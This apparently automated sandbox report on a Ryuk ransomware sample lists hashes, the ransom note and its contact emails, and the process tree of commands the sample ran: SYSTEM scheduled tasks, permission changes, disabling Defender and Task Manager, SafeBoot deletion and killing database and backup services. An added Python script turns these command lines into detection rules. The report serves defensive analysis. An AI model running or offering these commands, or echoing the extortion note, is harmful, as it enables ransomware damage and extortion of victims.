Resubmissions

21-09-2022 20:38

220921-ze6ayshae5 10

21-09-2022 20:33

220921-zbzzrscfcl 10

Analysis

  • max time kernel
    112s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21-09-2022 20:33

Errors

Reason
Machine shutdown

General

  • Target

    ryuk.exe

  • Size

    885KB

  • MD5

    35194c73ff38dd6c3bed7c0efcff6826

  • SHA1

    1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

  • SHA256

    5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

  • SHA512

    cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

  • SSDEEP

    12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Recoverfile@aol.com or Recoverfile1@aol.com You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

Recoverfile@aol.com

Recoverfile1@aol.com

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Disables Task Manager via registry modification
  • Drops startup file (3 IoCs)
  • Modifies file permissions (1 TTP, 1 IoC)
  • Enumerates connected drives (3 TTPs, 24 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory (64 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) (1 TTP, 4 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)
  • Views/modifies file attributes (1 TTP, 3 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\ryuk.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:3600
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:5032
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      PID:1732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4112
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:4192
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\system32\attrib.exe
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        3⤵
        • Drops startup file
        • Views/modifies file attributes
        PID:1128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3596
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:4528
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:3568
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\attrib.exe
        attrib +h +s ryuk.exe
        3⤵
        • Views/modifies file attributes
        PID:2372
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\ProgramData\ryuk.exe
        3⤵
        • Views/modifies file attributes
        PID:2324
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\system32\cmd.exe
        cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4352
        • C:\Windows\system32\icacls.exe
          icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          4⤵
          • Modifies file permissions
          PID:388
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4532
      • C:\Windows\system32\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
        3⤵
        PID:1472
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:228
      • C:\Windows\system32\cmd.exe
        cmd.exe /c taskkill /t /f /im sql*
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Windows\system32\taskkill.exe
          taskkill /t /f /im sql*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:968
      • C:\Windows\system32\taskkill.exe
        taskkill /f /t /im veeam*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3884
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
      2⤵
      PID:3080
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
      2⤵
      PID:1124
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
      2⤵
      PID:5112
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
      2⤵
      PID:4804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
      2⤵
      PID:5060
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\system32\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        PID:4564
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:2548
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        PID:2464
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
      2⤵
      PID:1976
      • C:\Windows\system32\reg.exe
        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
        3⤵
        PID:1288
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
      2⤵
      PID:3876
      • C:\Windows\system32\reg.exe
        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
        3⤵
        PID:1312
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4988
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d
    1⤵
    PID:4124
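The child command lines in the process tree above are the raw material for host-side detection: every persistence, hiding, permission, registry and service-kill step is a plain cmd.exe child with a recognisable switch pattern. As an added example (not part of this report, and not the sandbox's own signature engine), the Python below replays the report's signature names as regular-expression rules over process-creation events transcribed from the tree, parses the schtasks switches so the ONLOGON tasks that run as SYSTEM stand out from an ordinary task, and scores the batch. The event list is constructed from this page plus one benign control line (PID 9001, NightlyBackup) that is not in the report; the rule names reuse the report's signature names where one exists, while the three rules without a report signature (Defender DisableAntiSpyware, EnableLinkedConnections, SafeBoot deletion), the ELEVATED_TASK name and the scoring threshold are assumptions of this example.

```python
"""Rule-based triage of process-creation command lines (e.g. EDR or Sysmon
Event ID 1 exports) keyed on the behaviours this report records."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


# Constructed sample: child command lines transcribed from the report's
# process tree with the report's PIDs, plus one benign control line
# (PID 9001) that is NOT in the report.
SAMPLE_EVENTS = [
    Event(3600, 3064, r'schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F'),
    Event(5032, 4824, r'C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"'),
    Event(4192, 4112, r'schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F'),
    Event(1128, 1672, r'attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"'),
    Event(4528, 3596, r'schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F'),
    Event(388, 4352, r'icacls * /grant Everyone:(OI)(CI)F /T /C /Q'),
    Event(1472, 4532, r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f'),
    Event(968, 1556, r'taskkill /t /f /im sql*'),
    Event(3884, 228, r'taskkill /f /t /im veeam*'),
    Event(4564, 2896, r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    Event(2464, 2548, r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    Event(1312, 3876, r'reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F'),
    Event(9001, 9000, r'schtasks /CREATE /SC DAILY /TN NightlyBackup /TR C:\Tools\backup.exe'),
]

# (rule name, regex over the whole command line). Names reuse the report's
# signature names where one exists; the last three are this example's own.
# Matching is case-insensitive because cmd.exe and the Windows tools are,
# and nothing is anchored on a drive letter so both the %appdata% form and
# the expanded path seen by attrib.exe match.
RULES = [
    ('Creates scheduled task(s)', r'\bschtasks(?:\.exe)?\b.*\s/create\b'),
    ('Drops startup file', r'\b(?:copy|move|xcopy)\b.*\\start menu\\programs\\startup\\'),
    ('Views/modifies file attributes', r'\battrib(?:\.exe)?\b.*\+[hs]\b'),
    ('Modifies file permissions', r'\bicacls(?:\.exe)?\b.*\s/grant\s+everyone:'),
    ('Disables Task Manager via registry modification',
     r'\breg(?:\.exe)?\s+add\b.*\\policies\\system\s+/v\s+disabletaskmgr\b.*\s/d\s+1\b'),
    ('Kills process with taskkill',
     r'\btaskkill(?:\.exe)?\b.*\s/im\s+(?:sql|veeam|msexchange|microsoft\.exchange|pvx|dbsrv)\b'),
    ('Disables Windows Defender via registry modification',
     r'\breg(?:\.exe)?\s+add\b.*\\windows defender"?\s+/v\s+disableantispyware\b.*\s/d\s+1\b'),
    ('Exposes mapped drives to elevated processes (EnableLinkedConnections)',
     r'\breg(?:\.exe)?\s+add\b.*\s/v\s+enablelinkedconnections\b.*\s/d\s+1\b'),
    ('Deletes SafeBoot registry values', r'\breg(?:\.exe)?\s+delete\b.*\\control\\safeboot\b'),
]
ELEVATED_TASK = 'Scheduled task runs as SYSTEM at logon'  # example's own name

_TASK_ARG = re.compile(r'/(tn|sc|tr|ru|rl)\s+("[^"]*"|\S+)', re.IGNORECASE)


def parse_schtasks(cmdline: str) -> dict:
    """Persistence-relevant schtasks switches with lower-case keys and quotes
    stripped; {} when the line is not a schtasks invocation. An unquoted /TR
    path containing spaces is truncated at the first space (schtasks itself
    requires quoting there)."""
    if not re.search(r'\bschtasks(?:\.exe)?\b', cmdline, re.IGNORECASE):
        return {}
    return {k.lower(): v.strip('"') for k, v in _TASK_ARG.findall(cmdline)}


def scan(events) -> list:
    """Apply every rule to every event; a schtasks line gets a second finding
    when the task is created to run as SYSTEM at logon, as in the report."""
    findings = []
    for ev in events:
        for name, pattern in RULES:
            if re.search(pattern, ev.cmdline, re.IGNORECASE):
                findings.append(Finding(ev.pid, name, ev.cmdline))
        task = parse_schtasks(ev.cmdline)
        if task.get('sc', '').upper() == 'ONLOGON' and task.get('ru', '').upper() == 'SYSTEM':
            detail = f"{task.get('tn')} -> {task.get('tr')} (/RL {task.get('rl', '?')})"
            findings.append(Finding(ev.pid, ELEVATED_TASK, detail))
    return findings


def rules_for(findings, pid: int) -> set:
    return {f.rule for f in findings if f.pid == pid}


def distinct_behaviours(findings) -> set:
    return {f.rule for f in findings}


def verdict(findings, threshold: int = 4) -> str:
    """Crude scoring (threshold is an assumption): one rule alone can be admin
    activity, as the benign NightlyBackup task shows; several distinct
    behaviours in one batch is what this report's signature list reflects."""
    return 'ransomware-like' if len(distinct_behaviours(findings)) >= threshold else 'review'


if __name__ == '__main__':
    found = scan(SAMPLE_EVENTS)
    for f in found:
        print(f'PID {f.pid:>5}  {f.rule}: {f.detail[:60]}')
    print(verdict(found), len(distinct_behaviours(found)), 'distinct behaviours')
```

Two points the run makes that the flat signature list does not: the same rule fires on the benign daily task as on the RYUK task, so the scheduled-task rule only becomes interesting in combination with the /RU SYSTEM /SC ONLOGON parse or with the other behaviours, and the three task names in the tree (RYUK, ryk, RyuK) all point at the same two copies of the sample, so a hunt should key on the /TR target path rather than the task name.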

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution: Scheduled Task (1) T1053
  • Persistence: Scheduled Task (1) T1053; Hidden Files and Directories (1) T1158
  • Privilege Escalation: Scheduled Task (1) T1053
  • Defense Evasion: File Permissions Modification (1) T1222; Hidden Files and Directories (1) T1158
  • Discovery: Query Registry (1) T1012; Peripheral Device Discovery (1) T1120; System Information Discovery (2) T1082

Downloads

  • C:\ProgramData\RYUKID
    Filesize 8B
    MD5 20bf1c3daf0bf3cfb0db6661538a9afc
    SHA1 5db0319ce78dcae075cc393c374b0856cdc2e02a
    SHA256 fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
    SHA512 bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

  • C:\ProgramData\RyukReadMe.txt
    Filesize 1KB
    MD5 3cfd6ef3b2825aa6ce421e10604ff452
    SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
    SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
    SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

  • C:\ProgramData\hrmlog1
    Filesize 2KB
    MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
    SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
    SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
    SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

  • C:\ProgramData\hrmlog2
    Filesize 292B
    MD5 9c66e5c92f7a62d7203428c7d1cda350
    SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
    SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
    SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

  • C:\ProgramData\ryuk.exe
    Filesize 885KB
    MD5 35194c73ff38dd6c3bed7c0efcff6826
    SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
    SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
    SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

  • C:\Users\Admin\AppData\Local\Temp\RYUKID
    Filesize 8B
    MD5 20bf1c3daf0bf3cfb0db6661538a9afc
    SHA1 5db0319ce78dcae075cc393c374b0856cdc2e02a
    SHA256 fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
    SHA512 bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

  • C:\Users\Admin\AppData\Local\Temp\hrmlog1
    Filesize 2KB
    MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
    SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
    SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
    SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

  • C:\Users\Admin\AppData\Local\Temp\hrmlog2
    Filesize 292B
    MD5 9c66e5c92f7a62d7203428c7d1cda350
    SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
    SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
    SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
    Filesize 885KB
    MD5 35194c73ff38dd6c3bed7c0efcff6826
    SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
    SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
    SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

  • memory/228-154-0x0000000000000000-mapping.dmp
  • memory/388-161-0x0000000000000000-mapping.dmp
  • memory/628-144-0x0000000000000000-mapping.dmp
  • memory/968-165-0x0000000000000000-mapping.dmp
  • memory/1124-160-0x0000000000000000-mapping.dmp
  • memory/1128-140-0x0000000000000000-mapping.dmp
  • memory/1148-146-0x0000000000000000-mapping.dmp
  • memory/1288-178-0x0000000000000000-mapping.dmp
  • memory/1312-180-0x0000000000000000-mapping.dmp
  • memory/1472-153-0x0000000000000000-mapping.dmp
  • memory/1556-155-0x0000000000000000-mapping.dmp
  • memory/1672-139-0x0000000000000000-mapping.dmp
  • memory/1732-136-0x0000000000000000-mapping.dmp
  • memory/1976-177-0x0000000000000000-mapping.dmp
  • memory/2324-149-0x0000000000000000-mapping.dmp
  • memory/2372-147-0x0000000000000000-mapping.dmp
  • memory/2464-176-0x0000000000000000-mapping.dmp
  • memory/2548-175-0x0000000000000000-mapping.dmp
  • memory/2764-150-0x0000000000000000-mapping.dmp
  • memory/2768-148-0x0000000000000000-mapping.dmp
  • memory/2896-173-0x0000000000000000-mapping.dmp
  • memory/3064-132-0x0000000000000000-mapping.dmp
  • memory/3080-157-0x0000000000000000-mapping.dmp
  • memory/3568-145-0x0000000000000000-mapping.dmp
  • memory/3596-142-0x0000000000000000-mapping.dmp
  • memory/3600-133-0x0000000000000000-mapping.dmp
  • memory/3876-179-0x0000000000000000-mapping.dmp
  • memory/3884-156-0x0000000000000000-mapping.dmp
  • memory/4112-137-0x0000000000000000-mapping.dmp
  • memory/4192-138-0x0000000000000000-mapping.dmp
  • memory/4352-152-0x0000000000000000-mapping.dmp
  • memory/4528-143-0x0000000000000000-mapping.dmp
  • memory/4532-151-0x0000000000000000-mapping.dmp
  • memory/4564-174-0x0000000000000000-mapping.dmp
  • memory/4804-169-0x0000000000000000-mapping.dmp
  • memory/5032-134-0x0000000000000000-mapping.dmp
  • memory/5060-171-0x0000000000000000-mapping.dmp
  • memory/5112-164-0x0000000000000000-mapping.dmp